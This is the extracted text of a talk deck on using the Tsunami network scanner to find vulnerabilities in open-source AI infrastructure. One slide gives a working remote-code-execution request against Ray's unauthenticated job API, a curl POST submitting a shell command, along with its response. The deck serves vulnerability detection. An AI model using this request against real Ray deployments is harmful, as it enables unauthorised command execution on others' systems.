Secure OSS AI Infrastructure with Tsunami Network Scanner
Annie Mao
Andrey Kovalev
1
Agenda
2
2
Tsunami 101
3
Tsunami
Find vulns in minutes
Be false positive free
Focus on critical vulns
Deploy new detectors fast
Keep it open source
4
4
Tsunami architecture
Tsunami scan consists of 2 parts: |
Reconnaissance: identifies open ports, protocols, services and other software running on the target Vulnerability verification: selects relevant detectors to run for each service which verifies if a vulnerability exists |
5
5
AI Infrastructure
& security risks
6
AI risks in Tsunami scope
Generation
Serving
Data preprocessing
Training and evaluation
Data sources
Serving
Applications
Model storage
Generation
Data storage
Data preprocessing
Training and evaluation
7
7
Popular AI Frameworks and serving platforms
8
8
Example of the RCE vulnerability in Ray.IO
curl -H 'Content-Type: application/json' -d '{"entrypoint":"echo hello"}' -X POST "http://127.0.0.1:8265/api/jobs/" creates a new job to execute the command:
{"job_id": "raysubmit_C4TMa9eH8vfHcDri", "submission_id": "raysubmit_C4TMa9eH8vfHcDri"}
9
9
New approach for
plugin development
10
New plugin development workflow
11
11
Internet CTF Preview
12
12
Thank you!
Subscribe for more updates
13